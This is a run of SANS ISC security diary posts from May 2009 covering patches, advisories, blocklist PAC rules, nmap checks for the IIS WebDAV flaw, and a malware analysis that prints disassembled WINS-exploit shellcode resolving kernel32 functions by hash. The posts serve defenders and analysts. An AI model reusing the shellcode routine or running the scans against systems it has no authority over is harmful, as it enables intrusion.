Published: 2009-05-31

L0phtcrack is Back!

Many thanx to Rob V. for providing the update that l0phtcrack is back in full force!  I have personally used LC4 & LC5 for quite some time, and am looking forward to the presentation features of LC6.  LC is back in the "hands of the original authors from the L0pht who are giving it the care and feeding it deserves" which gives pen testers and auditors more great things to look forward to in the near future.


Published: 2009-05-30

Embedded Devices: An Avenue for Cyberterrorism?

There has been growing concern with the security of embedded devices as they continue to proliferate in several industries. This is caused by a confluence of several issues that makes for a difficult problem to solve.

First, these devices more and more rely on commodity operating systems (which carry with them commodity vulnerabilities and exploits).  Second, there is a great deal of restriction with what consumers of these devices can do with them.  Very often, you simply can’t touch the operating system at all.  Last, these devices tend to be notoriously difficult to update usually requiring the vendor to come out with a CD to “reflash” the device. Updates are few and far between, if updates are put in place at all.

The product is that this puts a device subject to a good subset of the same vulnerabilities that any workstation is but makes it very difficult to put it in the same patch rotation much less maintain and harden it.  Ideally, these devices shouldn’t be plugged into a network, but often they are.  For instance, many embedded devices for SCADA and healthcare have reportedly been infected by Conficker (among others).

In those cases, they just got infected with commodity malware and behaved like your typical infected host. The scary part of this is, these devices can control very important things. Years ago, I would chafe at anyone using the word “cyberterrorism”. Terrorism has a specific definition that is a bit more restrictive than “something bad”.  It’s not terrorism unless widespread debilitating fear is involved.

However, now with embedded devices in hospitals, you have devices vulnerability to commodity exploits but the payload can be modified to do something bad with that devices functionality.  In health care, for instance, if the device controls some “life-saving” or “life-sustaining” function, malware could have it intentionally cause harm.  That would be an example of cyberterrorism.  People would very quickly develop a fear of health care.  So what can we do about it?

The real solution is that embedded device manufacturers need to provide updateability to these devices and ship them hardened. Barring that, here are some tips to help protect facilities that use these devices.

1)    If they don’t need to be on a network, take a Cat5 cable, cut off the RJ45 adapter and about an inch of cable and plug that into the port.  Not only does this fill the gap, it makes people think twice before “just plugging it in”.  Hang a note off the cable, if necessary.
2)    If these devices have a unique vendor for the network card, use network access control to simply block all the MAC addresses for that vendor.  For instance, MAC address AA:AA:AA:22:22:22 has a vendor portion of AA:AA:AA and the unique host portion is 22:22:22.  So block AA:AA:AA:*.
3)    If they absolutely must be networked, create an “islanded” network. In short, a network where there is no external facing components or totally isolated LAN.
4)    Limit all access to the device via network, via USB or via Bluetooth.  All these can be used as infection mechanisms.

What are your thoughts? Those of you using embedded devices or vendor “black boxes”, how are you securing them?

John Bambenek
bambenek /at/ gmail.com


Published: 2009-05-29

Its summer...Do you know what your kids are doing?

School is over or about to be over for many kids.  With that comes many families whose parents work and kids will be left at home to relax and enjoy their summer vacation.    This means alot of free time and an internet out there just waiting to be explored.  Everyone is aware of the need to keep your kids safe while on the internet.  But in some cases, there is a need to keep the internet and others safe from your kids.  Let me explain that last comment.  Kids with too much time on their hands get into trouble.  You hear about it all the time on the news with kids getting into trouble with things such as vandalism, stealing,etc.  What about kids getting into trouble on the internet? 

Do a google search on the phrase "teenage hacker" and see what comes up.  Kids are curious and learn fast.  The internet can become a playground for them to explore and test out cool new programs and tools they find on the internet or write themselves.  Chat rooms are available where kids can learn many things from others and want to try them for themselves.  They can also get pulled into the "wrong crowd" on the internet and get in way over their heads fast.  They may not even see anything wrong with it, its just computers after all. 

Most of the filtering technology today focuses on web traffic.  What are your kids looking at on the web.  That is a good thing, but there are many other ports and protocols available and nothing watching them.  Would you know if your child was running a botnet?  Stealing credit card numbers?  Hacking into websites?  Its not a game and there are real consequences to it, even sometimes when the intent may have been to do good. Here are some recent examples:

"Nineteen-year-old Dmitriy Guzner from New Jersey was part of an underground hacking group named 'Anonymous' that targeted the church with several attacks. He could face ten years in prison on computer hacking charges and is due to be sentenced on August 24."  http://www.securecomputing.net.au/News/144850,teenage-hacker-pleads-guilty-to-church-of-scientology-cyber-attacks.aspx

"Twitter has announced a review into four worm attacks on the site as a teenage hacker admits he could be jailed for his role in the stunt."  http://news.sky.com/skynews/Home/Technology/Twitter-Worm-Attack-Biz-Stone-Announces-Review-As-Teenage-Hacker-Michael-Mooney-Speaks-Out/Article/200904215261579

"A teenage hacker whose campaign to expose holes in Internet security sparked an FBI investigation was being sentenced in court today."  http://www.independent.co.uk/news/business/news/teenage-hacker-to-be-sentenced-for-internet-crusade-676871.html


As parents, we need to also talk to our kids about the other dangers that are on the internet.  Dangers such as hacking, virus making, botnet creation, stealing, etc.  You may think your child is doing nothing but sitting on a computer playing.  But keep in mind that a computer on the internet is a portal to a whole 'nother world. 


Published: 2009-05-29

VMWare Patches Released

Patches were released yesterday to fix a DoS vulnerability and potential arbitrary code execution.  Here are the two vulnerabilities:

1.  VMWare Descheduled Time Accounting driver:

The issue affects the VMWare Descheduled Time Accounting driver and can cause a denial of service in Windows based virtual machines on the vulnerable versions.   This driver is an optional (non-
default) part of the VMware Tools installation.  However, if the following conditions are met and their tools are not upgraded, virtual machines that are migrated from vulnerable releases are still vulnerable if the following three conditions exist:

- The virtual machine is running a Windows operating system.

- The VMware Descheduled Time Accounting driver is installed
in the virtual machine.

- The VMware Descheduled Time Accounting Service is not running
in the virtual machine

2.  libpng package for the ESX 2.5.5 Service Console

The libpng package is used for creating and manipulating PNG (Portable Network Graphics) image format files.  A crafted PNG file loaded by an application and linked against libpng could cause the application to crash or to allow arbitrary code execution that would run with the priveleges of the user that is using the application. 

Another flaw addresses PNG images that contain "unknown" chunks.  If an application linked against libpng
attempted to process a malformed, unknown chunk in a malicious PNG image, it could cause the application to crash.




Published: 2009-05-29

Blackberry Server Vulnerability

For all of you running around with a Blackberry, be careful of opening .pdf files.  A vulnerability announced on Tuesday allows for specially crafted .pdf files when opened on your blackberry to potentially  "cause memory corruption and possibly lead to arbitrary code execution on the computer that hosts the BlackBerry Attachment Service."  If you have not done so, please make sure your servers are patched. The versions afftected are:

  • BlackBerry® Enterprise Server software version 4.1 Service Pack 3 (4.1.3) through 5.0
  • BlackBerry® Professional Software 4.1 Service Pack 4 (4.1.4)

If anyone has gotten or gets a malicious .pdf, please send us a copy.


Published: 2009-05-28

Microsoft DirectShow vulnerability

 Microsoft have recently announced a Microsoft DirectShow vulnerability via an advisory and multiple blog entries. 

The advisory indicates that Microsoft are investigating public reports of a vulnerability within the DirectShow element of DirectX - CVE-2009- 1537 has been allocated to this vulnerability.

Microsoft have published quite a detailed set of actions which provide a temporary workaround for this issue to prevent the download of a crafted QuickTime formated file.

The following information has been posted:


In the advisory Microsoft have indicated that a patch will be produced for this but give no timescales. To reduce the potential risk you should consider the impact of applying the workaround versus the period of nil-protection whilst it's MAPP/MSRA partners get definitions out for detection, etc.

SecurityFocus have reported that targeted exploits of this issue have been seen in the wild.



Published: 2009-05-28

Stego in TCP retransmissions

I just started reading an interesting new paper out of the Warsaw University of Technology entitled Hiding Information in Retransmission.  This got me to thinking, even those of us who have extensive monitoring of our network rarely will have the capability to compare retransmitted packets to the original to detect this.  A really interesting idea.  The abstract can be found here and the paper itself here.


Published: 2009-05-28

More new volatility plugins

If you follow our diary at all, by now, you know I am a big fan of volatility for doing analysis of memory images.  I use it quit a bit in my automated malware analysis environment.*  Well, our friend, Michael Hale Ligh, who brought us the excellent malfind plugin has released another great plugin, the usermode_hook plugin.  Read his writeup, it is well worth the time.


*Shameless plug: Come to SANSFIRE in Baltimore next month and meet many of the handlers, I'll be talking about my automated environment including how I currently use volatility and some of what I still want to do with it.


Published: 2009-05-27

WebDAV write-up

SusanB wrote in today to tell us about a really good write-up on understanding Microsoft’s KB971492 IIS5/IIS6 WebDAV vulnerability by Steve Friedl of is available here.
This was written because Steve and some of others at unixwiz.net found Microsoft’s "guidance confusing for users who were not IIS experts".  This includes a very good flowchart that should assist anyone who is confused, detailed descriptions of WebDAV, remediation ideas, and links to other WebDAV references.


Published: 2009-05-27

Host file black lists

Henry Hertz Hobbit who maintains a black list of "bad hosts" wrote in today with some host file links
and comments on them. I have included most of his comments with very little editing
(I removed a few names and comments about other list maintainers and corrected a bit of the grammer).
I have NOT verified all of the lists than Henry discusses below. Our users should be warned that
I have seen poorly maintained lists block legitimate sites in the past.
We have had some less attentive or overly aggressive list maintainers use our hosts
list as a block list even though it clearly states  "DO NOT USE AS A BLOCK LIST"
and then blame isc.sans.org for the listing, http://isc.sans.org/ipsascii.html.
Other handlers have written some excellent diaries about blocklists addressing issues
such as Spam blocking by RBLs, Blocklists and politics,
and making the right choice in black list selection:

For more information on host based blocking this site has a good descriptions,
some lists that are on Henry’s lists and some additional lists didn’t include in his set.

From Henry Hertz Hobbit:
"Two old venerable lists are MVPHosts and hpHosts.

MalwareDomainList is here with their lists and they block ONLY sites with malicious
content (no ads or trackers / spies):

The French connection consists of what I would call the MVPHosts file with a Français twist
(there are some trackers that are quite prevalent if France that don't exist any place else):

Another list that has the most comprehensive lists that may need some pruning:

This list primarily don't belong on the desktop but into something like this:

And then there is my list which includes many of the hosts that MalwareDomainList lists.

But I provide something far more powerful called a PAC (Proxy Auto Configuration) filter
that blocks unknown threats:

Now I have heard you need an IQ of 130 plus or higher to use the PAC filter. 
If that is a problem so be it.  But consider the following points.

1. hpHosts (hosts-file.net) blocks approximately 3700 typo hosts. 
I block them with just two hosts in the hosts file (ownbox.com and www.ownbox.com)
and these two rules in the PAC filter:

BadNetworks[i++] = ",";
BadNetworks[i++] = ",";

Now that cuts it down to size, doesn't it?  There is a lot of other power reducers and
falling through the cracks rules in there!  Otherwise my file would be almost as large
as the list at rlwpx.free.fr/WPFF/hosts.htm.

2. If you enable the PAC filter on Windows in IE you will have your eyes opened.
I had full debug on that way once and found the PAC filter was even working at the level
of tellimg me I sent a print-out to the network printer!  But debug really should only
be used in Firefox with debug mode set to debugNormal.  Do not turn debug on in Opera or
Safari (they kill it), or IE (you will have pop-up nightmares).

3. The REGEXPs are precompiled for speed.  It is faster in debug mode than John LoVerso's
original was without any debug.  But then I noticed some of his ad patterns are pretty convoluted. 
But if you have to interpret them every time ...

4. I notice patterns that occur frequently enough that I block yet to be discovered
hosts with patterns like these:
BadHostParts[i++] = "antispy";  // VOTRE CHOIX
BadHostParts[i++] = "antivir";  // VOTRE CHOIX

There are of course some white-list rules to counteract the bad rules
(and now you are back to blocking in the hosts file):
GoodDomains[i++] = "antispamfilterblocker.com";
GoodDomains[i++] = "antivirusyellowpages.com";
GoodDomains[i++] = "pcantivirusreviews.com";

5.  Even if hosts make it past the rules for the hosts and there is no host block,
for some of the malware there are patterns and I block them as I discover and
mentally count them and consider the count high enough to go into panic mode
(and I think a lot of people are already there now):

BadURL_Parts[i++] = "av2008";
BadURL_Parts[i++] = "av2009";
BadURL_Parts[i++] = "sms.exe";
BadURL_Parts[i++] = "smsreader";

Oh yes, HostsMan is available here:
http://www.abelhadigital.com/ "

UPDATE: Steven, another blocklist maintainer, pointed out this article he wrote about blocklists, host files and PAC files.



Published: 2009-05-26

Vista & Win2K8 SP2 available

Microsoft Windows Vista and 2008 Service Pack 2 is now officially available for download (32 bit and 64 bit). Given the recent trojaned copies of MS software on Bittorrent, we suggest everyone to download directly from Microsoft's site. If you are in no hurry to get this, it will be automatically downloaded and updated for you by Windows update within a few weeks.


Jason Lam  http://www.twitter.com/jasonlam_sec


Published: 2009-05-26

A new Web application security blog

If you have any interest in Web application security, you might want to check out this new SANS Web Application Security blog. Lots of information related to web app sec provided.


The contributors of this blog are ISC handlers (Johannes Ullrich and Jason Lam) and various other SANS instructors.


Published: 2009-05-25

NTPD autokey vulnerability

US Cert published VU#853097 the other day detailing an exploitable buffer overflow in the implementation of the autokey feature.  The folks at ntp.org have released version 4.2.4p7 to correct it, download here.  The announcement can be seen here.


Published: 2009-05-25

Wireshark-1.0.8 released

Speaking of wireshark, a new version was released last week which fixes a vulnerability in the PCNFSD dissector.



Announcement: http://www.wireshark.org/news/20090521.html

Advisory:  http://www.wireshark.org/security/wnpa-sec-2009-03.html

Release notes:  http://www.wireshark.org/docs/relnotes/wireshark-1.0.8.html

Download:  http://www.wireshark.org/download.html


Published: 2009-05-25

More tools for (US) Memorial Day

For those of you (in the US anyway) enjoying a day off and BBQ-ing, here is another cool new tool I came across earlier today over on Malware Forge, called nPeID.  Like my packerid.py, it uses Ero Carrera's pefile package.  I'll be checking it out later this afternoon.


Published: 2009-05-24

Facebook phising using Belgium (.be) domains

This is not new or exciting, but as we have received several reports during the weekend (thanks to all that wrote in - Kevin, Mike, Rick), you all should know what is going on. It seems a new Facebook phising/spam/"worm" campaign is doing the rounds. It uses Belgium domains (.be) to impersonate the Facebook login page and steal the user credentials.

Some of the malicious domains being used are redfriend dot be, redbuddy dot be, picoband dot be... (at this point, none of them can be resolved).

It's recommended to filter access to all them (and the others coming)!

Raul Siles


Published: 2009-05-24

Analyzing malicious PDF documents

As we announced in a recent ISC diary, Adobe is changing its patching model and strategy, but it seems still JavaScript will be enabled by default in Adobe Acrobat and Reader. As a consequence, I foreshadow more PDF vulnerabilities, exploits and attacks in the near future (let's hope I'm wrong).

On the one hand, I've been actively using PDF exploits in recent penetration tests, emulating the real-world attacks we have seen in the wild and described in several ISC diaries during the last 2-3 years (you can get most of them using the following search in Google: "pdf site:isc.sans.org"). Both, the open-source Metasploit Framework, and commercial pen-testing tools, like Core Impact, include these capabilties.

On the other hand, we need to be able to disect these malicious files when we are the target . The Hakin9 magazine has made available this week (for free) a great introductory article on the internal formatting of PDF files and how to analyze malicious PDF documents, those exploiting a vulnerability in the embedded JavaScript interpreter (very common), by Didier Stevens (a well known PDF expert we've mentioned regarding previous PDF vulnerabilities):

"Anatomy of Malicious PDF Documents". Didier Stevens. Hakin9 magazine.

In order to get a copy of the article, in PDF format (What a coincidence! Is it malicious or not?  ), you just need to provide an e-mail address. Do not forget to download the RTF document with the code listing (link on the right hand side).

This article is a must read and great starting point for incident handlers interested on increasing their skills to analyze malicious PDF documents. If you want to start practicing today, before being a target, generate a malicious PDF document in Metasploit and analyze it. For more advanced inspection, I encourage you to use some specific PDF analysis tools.

Raul Siles


Published: 2009-05-24

IIS admins, help finding WebDAV remotely using nmap

If you are concerned about the recent IIS 6.0 WebDav Remote Auth Bypass vulnerability, you will be interested on detecting if you are running WebDAV and if you are vulnerable. You can do that locally or remotelly. I can identify scenarios were both methods are useful to audit internal or external web servers.

For local testing, please follow Adrien's diary from a couple of days ago.

For remote testing you can use our good friend nmap, and a new NSE script (http-iis-webdav-vuln) by Ron Bowes. I've been using it on a recent penetration test, but it can be equally used in your vulnerability assessments and pre-incident handling tasks following two easy steps:

  • Download/Update & compile nmap from the SVN repository:
$ svn co --username guest --password "" svn://svn.insecure.org/nmap/
$ cd nmap
$ ./configure
$ make
$ sudo make install
  • Run the script just against your IIS web servers (specify the web server port accordingly, "-p" option):
$ nmap -n -PN -p80 --script=http-iis-webdav-vuln <target_web_server.domain.com>
  • The script doesn't work directly against HTTPS web servers. Therefore, you need to make use of the nmap's service detection capabilities ("-sV") to make it work:
$ nmap -n -PN -sV -p443 --script=http-iis-webdav-vuln <target_web_server.domain.com>


This NSE script launches a kind of dictionary attack, searching for potential web server folders. If you want to avoid it, because you just want to test an existing specific folder or subfolder, use the "--script-args=webdavfolder=<PATH>" option to specify it (all in one line):

$ nmap -n -PN -p80 --script=http-iis-webdav-vuln 
  --script-args=webdavfolder="protected/webdav/folder/" <target_web_server.domain.com>

This is a listing of the most common output you can get:

  • WebDAV is disabled on a HTTP server:
80/tcp open  http
|_ http-iis-webdav-vuln: WebDAV is DISABLED. Server is not currently vulnerable.

  • WebDAV is disabled on a HTTPS server:
443/tcp open  ssl/http Microsoft IIS webserver 6.0
|_ http-iis-webdav-vuln: WebDAV is DISABLED. Server is not currently vulnerable.
Service Info: OS: Windows

  • WebDAV is enabled on a HTTP server, but no folder was found:
80/tcp open  http
|_ http-iis-webdav-vuln: WebDAV is ENABLED. No protected folder found; check not run. 
If you know a protected folder, add --script-args=webdavfolder=<path>

  • WebDAV is enabled on a HTTP server, but the specified folder is not vulnerable:
80/tcp open  http
|_ http-iis-webdav-vuln: WebDAV is ENABLED. Could not determine vulnerability of folder: 

  • WebDAV is enabled on a HTTP server, and vulnerable folders were found:
80/tcp open  http
|_ http-iis-webdav-vuln: WebDAV is ENABLED. Vulnerable folders discovered: /secret, /webdav


Please, audit ALL your web servers before anybody else does! ... and don't forget to look at your web server logs to check if someone is already testing it!

Raul Siles


Published: 2009-05-22

Patching and Apple - Java issue

At the other end of the spectrum is Apple.  There is a java issue (CVE-2008-5353) which was reported to Sun and fixed by Sun back in December.   For some reason the fix for this was not included in the recent security updates all Mac users would have received recently.   Why not?

Actually thats what we asked, but the response was a tad disappointing and not at all enlightening.  In the mean time Mac users are vulnerable to a simple driveby exploit.  The POC code was posted on Milw0rm a couple of days ago.  You can read more on the issue here and here.  The page on the first link has a link which will execute the /usr/bin/say command using a java applet it demonstrates the issue nicely.

It won't be long before it is being used in live exploits.   Apple, please fix it, soon.   In the mean time people disable java.


Brian Krebs wrote about this issue as well, you can read it here.  The main story doesn't really say anything new, but he has done some additional analysis and mapped the differences between Sun fixing a java issue and Apple releasing the update, which is interesting.  You can find that here.  


Mark H 



Published: 2009-05-22

Patching and Adobe

 We all remember the beating Adobe received back in February regarding the JBIG2 issue.  The patch was very slow in coming and basically the response was, well, pretty pathetic.   

Now as any incident handler knows one of the most important steps in the incident handling process is the lessons learned.  So it was very refreshing to see Adobe follow this principle and learn from the incident.  They have in the last few days announced what they are doing.  Which you can read here and here.

They'll do a quarterly patch cycle and fit  it in with the second Tuesday of the month.  Based on the response earlier in May it looks like their new processes are working so far.  We'll have to see how it pans out throughout the year. 

Mark H - Shearwater






Published: 2009-05-21

IIS admins, help finding WebDAV

Microsoft have pointed to one of their KB articles for helping admins in an enterprise to locate IIS boxes with WebDAV enabled. It is located here. There is also a blog post here with some FAQ on WebDAV. This is particularly useful if you are concerned about IIS 6.0 WebDav Remote Auth Bypass on internal systems.

Adrien de Beaupré
Intru-shun.ca Inc.



Published: 2009-05-21

Gumblar analysis and writeup

Andrew has performed a client side analysis and writeup of recent gumblar malware attacks. It can be found here.

Adrien de Beaupré
Intru-shun.ca Inc.


Published: 2009-05-20

Speling and Grammur Opshunall

Wanted: Person of low moral character to correct spelling/grammar mistakes on phishing postings. Must be motivated, self starter. Computer knowledge, criminal background, and personal hygiene skills preferred but not required.

Ok, I say this a lot, but this time I mean it waaaaay more than usual.  DO NOT EVEN THINK OF FOLLOWING ANY LINK YOU MAY COME ACROSS IN ANY SEARCH RELATED TO THIS STORY.  Bad, bad things will happen to you.

Capitalizing on the burgeoning desire on the part of every red-blooded male to see the U.S. President's main squeeze in the buff, some enterprising malware knotheads have been seeding various comment boards out there with links "photos" of the First Ta-Ta's.

A little Googling on the phrases "As I've understood it was made by papara**i" and "will *issapear from internet tonight" (note, I'm not including the full quotes here, because I don't want to muddy the search engine waters...) will bring up a list of sites with links on their comment pages.  Big sites.  Sites that should know better.

What happens if you follow a link?  Well, that particular ride has a height restriction, and no matter how tall you think you are, you're not tall enough. DON'T DO IT.  REALLY.

The results of a visit will be documented in a future Follow The Bouncing Malware, but suffice to say, it's some pretty interesting stuff...

The links these guys are using change by the hour (but their pitch doesn't), so it should be pretty easy to kill these things.

And maybe I'm some sort of old skool fascist, but do you really need to allow live links on comment pages?


Published: 2009-05-20

CiscoWorks TFTP Directory Traversal Vulnerability

Cisco has announced that a directory traversal flaw has been discovered in its CiscoWorks product line.  According to the announcement:

Products that have TFTP services enabled and that run CiscoWorks
Common Services versions 3.0.x, 3.1.x, and 3.2.x are vulnerable.
Only CiscoWorks Common Services systems running on Microsoft Windows
operating systems are affected.

A successful exploitation of this vulnerability may allow an attacker
unauthorized access to view or modify application and host operating
system files. Modification of some system files could result in a denial
of service condition.

More information and a complete list of vulnerable products is available from:



Published: 2009-05-20

Cyber Warfare and Kylin thoughts

I believe that most of our readers heard about the Kylin OS.

This is suppose to be the super Chinese Operating system, designed to be US-proof...in other words, an OS that would make the US cyber-warfare tactics useless. More here on the Post article.

My personal opinion is that it is a huge hype on this.
First, Kylin is available for download, (Kylin 2.1.1a at kylin.org.cn ) and if this is the one being used by China to be their secure OS, or better yet, a US-Cyber-Warfare-bullet-proof, then there may be some problems...

The kernel OS is nothing more than our well known FreeBSD, with linux binary compatibility .
Second, Secure OSs are not something new, if we remember that SE-Linux was also funded by NSA.
Third, a Chinese OS shouldn't be US's main concern on Cyber Warfare...(more on this on the end of this diary).

Cyber Warfare is definitely a broad topic. In a simpler way, we can think as the way to reach a state or the state's critical infrastructure. It may include network penetration, DDoS, remote sabotage of critical infrastructure and "more".
Also, remember that there is no more range or defined battlespace.

If we think of the 4th generation warfare, it is even more complex, since it is not a formal war like Iran x Iraq anymore...now it is more like Israel x Hamas, or Pro-Palestine groups x NATO, or even PCA (Pakistan Cyber Army) x HMG ( Hindu Militant Group )...

Now, back on the Kylin story...do you really believe that we should be worried about the Chinese OS, when our Military and Government networks are vulnerable to worms that exploits PATCHED vulnerabilities and open shares??

My talk at SANSFire in Baltimore is called "Malwares, Money and Criminal/Terror Activity. The Dangerous Relationship", where I will cover some of these Cyber Warfare topics and more. If you plan to come, it will be on June 17th.

Pedro Bueno - pbueno && isc // .sans // .org


Published: 2009-05-20

Breakfast: Java, Serial, and an Apple

According to Julien Tinnes in the CR0 Blog, it appears that Apple's recent security update failed to fix a Java flaw that was reported to Sun back in August 2008 and patched by Sun way back in December 2008.  The upshot: according to the blog (and I've yet to be able to independently confirm it) any browser on OSX that uses the Apple-supplied version of Java is vulnerable to remote exploitation against a class of flaws known as Java deserialization vulnerabilities.

Deserialization is the process of retrieving stored data that an application previously "persisted."  Deserialization attacks take advantage of the fact that the deserialization process trusts that the data being pulled from storage is correctly formatted-- i.e. it contains only the types of data expected.

It's all rather complicated, but suffice to say, both Firefox and Safari appear to be exploitable, so until we hear something definitive from Apple on the subject, we would recommend running with Java disabled in your browser on OSX.

Speaking of hearing something definitive from AAPL, I'll be happy to print whatever they send us in an update to this diary.

Tom Liston - InGuardians, Inc.
ISC - Handler On Duty


Published: 2009-05-20

Web Toolz

Ok, a couple of web app testing tools have been recently updated/released:

  • My buddies Kevin Johnson, Justin Searle, and the rest of the SamuraiWTF dev team have released version 0.6 of the SamuraiWTF live web testing framework CD.  From the announcement:

"The SamuraiWTF project team is proud to announce the immediate release of
SamuraiWTF 0.6.  This release is available at http://samurai.inguardians.com.

We have updated and fixed a number of issues with the environment as
well as improved performance of the java based tools.  We have also included
a virtual machine of the environment.  This VM requires VMWare.

If there are any questions, please either send them to samurai@inguardians.com
or join the developers mailing list on sourceforge.net."

  • httpsScanner, a Java program that scans a web server to test the strength of its SSL connections has been released in version 1.1.  You can get a copy here.


Published: 2009-05-20

Follow the Bouncing Malware: Gone With the WINS - Part II

Imagine, if you will, that you're the newest contestant on the latest reality-tv show, Idle American Apprentice to the Dancing Bachelorette Stars.  Like all good reality shows (now there's an oxymoron...), you have the opportunity to "earn" your way to be safe from elimination (you know, that time of the evening when the grumpy, scowling dude with the bad comb-over says "You're Fired"®), if you can manage to "win" some sort of utterly contrived daily "challenge."

And, oh, what a challenge it is! 

You're teamed up with a partner, who is blindfolded, given a cell phone, and driven to your home.  After being spun around a few dozen times to mess with their sense of direction (and really, who doesn't like seeing dizzy, stressed-out people in blindfolds stumbling around in unfamiliar surroundings? Heck, that's how the missus and I spend many a Friday evening... uh... um... nevermind...) they're placed in some random room of your home.  Using only the cell phone, you need to be the first contestant to somehow direct them to find the kitchen and make your pouty-lipped, rail-thin bachelorette a peanut-butter 'n' jelly sammich.

So, what do you do?

Obviously, before anyone will be slappin' Smuckers and Skippy on bread, there's going to need to be a whole lot o'back-and-forth on the phone-- first, as you try to figure out where they are, and then as you try to tell them how to get where they need to be.  Remember, they can't see because they're blindfolded, so you'll need to rely on all of their other senses.  You might start by asking them whether there is carpet on the floor, whether they hear the ticking of a clock... you might ask them to slowly walk around the room and to tell you what the furniture they find in the room feels like, etc... etc... The idea is, you have to start by trying to somehow figure out their location.  Once you know where they are, then you can start giving them some broad direction: "First, face the couch... then turn left. Walk forward until you get to the wall, and then move along it to your left until you find the door. Go out through the door and turn left..."  Then, as you navigate them into the kitchen, you'll get increasingly specific: "open the third cupboard door to the left of the stove, the peanut butter is on the second shelf..."

The overall "flow" in the challenge can be summed up by a series of "big" questions, roughly corresponding to: "Where am I?", "Where is the kitchen?", and "Where is the stuff I need to make lil' Miss Skinny a sammich?"  Answering each of these requires that you've successful answered each of the questions that preceded it.

This is a fairly useful analogy to the situation in which the malware that we've been looking at has found itself.  Having exploited one of the WINS vulnerabilities patched in MS04-045, the malware is being executed in some pretty unfamiliar territory.  Like your partner in the challenge, it's not in a totally alien landscape: houses are houses... but knowing things about houses in general won't get you navigating around a specific house.  So it is for our chunk o' malware: it's missing all of the niceties that the operating system normally provides.  To understand why this is so, it's necessary for you to understand a little about how Windows programs actually work.

While there are literally millions of vastly different Windows programs available, in many ways, just like "a house is a house", a "program is a program."  On one level, they do many different things... on another level, they do many of the same things:  they display windows on the screen, they access information both from the filesystem, the peripherals, and from the network, they have clickable buttons, edit fields, drop down menus, scroll-bars, tabs, etc...  If each program on your system had to individually drag along all of the code necessary to do all of those things, then even the most trivial program would rapidly turn into a steaming, multi-megabyte pile of bloat-- i.e. your standard VisualBasic or Delphi app ;-)

To make life easier for programmers and consistent for users (hey, imagine if EVERY application had it's own "unique" user interface... ouch, that's gonna leave a mark...) much of the normal, day-to-day "stuff" that programs do has been rolled into shared code libraries ("Dynamic Link Libraries" or DLLs in Windows).  When a Windows program is built, all of the requests for the "stuff" found in the shared code libraries are relegated to a set of "jumping off points" called the "Import Table."  For example, if I write a program that displays a "Do you really want to delete this file?" message box (followed, no doubt, by a "Do you really, REALLY want to delete this file" request) the dialog box is displayed using the system function MessageBoxA().  When my program is compiled, every MessageBoxA() function call that I make in my application, actually goes to that "jumping off point" (which, up until the program loads, doesn't "jump off" to anything...)  When my program executes, the Windows Loader looks at the import table, and loads any of the shared DLL libraries that my program needs into its memory space.  It then runs down through the list of imported functions that my program is using, and fixes up those "jumping off points" so that they point to the correct place within the DLL code in my program's memory space.

Back to our analogy for a moment, the main application is like you... the person who knows their way around the house.  The running application (i.e. you), knows where everything is, because it was there when the house was "built" (i.e. when the Windows Loader loaded up the application and fixed up the import table)  The malicious code that we're looking at has never been in this particular "house" before, and it doesn't know where anything is... it's stumbling around blindfolded and... well... skinning its knees on the coffee table in the living room as we speak.

In Part 1 of this little excursion, we wrapped things up just when the malcode, after first figuring out its own location (so it could decrypt itself), had figured out where the BaseAddress of kernel32.dll was located.  In our analogy, this is the equivalent of you and your partner figuring out that they're in the living room, and then successfully navigating to the kitchen.  The kitchen (played by the enormously popular kernel32.dll) is where all the really useful tools are located... so now let's see how we're going to find them.

If you'll recall, we had just returned from a subroutine that chained through several in-memory data structures (starting with the Process Environment Block) to find the BaseAddress of kernel32.dll, which is now safely stored in EAX.  Here's what we return to:

0000047C                 mov     [esi], eax
0000047E                 push    dword ptr [esi]
00000480                 push    0EC0E4E8Eh
00000485                 call    sub_58E

Also recall that we had created a new chunk o' stack for ourselves and had stored its location in ESI.  When we returned from the previous subroutine, interestingly, the stack wasn't completely cleaned up... normally a very bad programming practice that would cause your program to toss its digital cookies. However, remember that the malware created it's own "mini-stack" and will (hopefully!) put things back the way it found it before it's through.  In any case, that first instruction is now shoving a copy of the base address of kernel32.dll into the "lost" stack space while the next instruction pushes a reference to that location onto the top of the stack.  In programming parlance, the "lost" stack locations were used "on the fly" to create some space that our malcode will use like a .bss segment (the .bss segment in a program is a segment which contains initialized data... Extra Credit: Anyone know why it's called ".bss"?)

Next, the malcode then pushes a pretty funky number (0xEC0E4E8E) onto the stack and then calls a subroutine.  What the heck is that all about?  Let's take a look at the code for the subroutine (sub_58E) that is being called, and see if we can figure it out:

0000058E ; ¦¦¦¦¦¦¦¦ S U B R O U T I N E ¦¦¦¦¦¦¦¦
0000058E sub_58E         proc near
0000058E arg_0           = dword ptr  14h
0000058E arg_4           = dword ptr  18h
0000058E                 push    ebx
0000058F                 push    ebp
00000590                 push    esi
00000591                 push    edi
00000592                 mov     ebp, [esp+arg_4]
00000596                 mov     eax, [ebp+3Ch]
00000599                 mov     edx, [ebp+eax+78h]
0000059D                 add     edx, ebp
0000059F                 mov     ecx, [edx+18h]
000005A2                 mov     ebx, [edx+20h]
000005A5                 add     ebx, ebp
000005A7 loc_5A7:
000005A7                 jecxz   short loc_5DB
000005A9                 dec     ecx
000005AA                 mov     esi, [ebx+ecx*4]
000005AD                 add     esi, ebp
000005AF                 xor     edi, edi
000005B1                 cld
000005B2 loc_5B2:
000005B2                 xor     eax, eax
000005B4                 lodsb
000005B5                 cmp     al, ah
000005B7                 jz      short loc_5C0
000005B9                 ror     edi, 0Dh
000005BC                 add     edi, eax
000005BE                 jmp     short loc_5B2
000005C0 ; --------------------------------------
000005C0 loc_5C0:
000005C0                 cmp     edi, [esp+arg_0]
000005C4                 jnz     short loc_5A7
000005C6                 mov     ebx, [edx+24h]
000005C9                 add     ebx, ebp
000005CB                 mov     cx, [ebx+ecx*2]
000005CF                 mov     ebx, [edx+1Ch]
000005D2                 add     ebx, ebp
000005D4                 mov     eax, [ebx+ecx*4]
000005D7                 add     eax, ebp
000005D9                 jmp     short loc_5DD
000005DB ; --------------------------------------
000005DB                 xor     eax, eax
000005DD loc_5DD:
000005DD                 mov     edx, ebp
000005DF                 pop     edi
000005E0                 pop     esi
000005E1                 pop     ebp
000005E2                 pop     ebx
000005E3                 retn    4
000005E3 sub_58E         endp
000005E3 ; --------------------------------------

"Gadzooks!  Now hold on just a darned minute!" I hear you cry. "When I signed up for this trip, you said 'some assembly required' but Tom, this is gettin' ridiculous..."

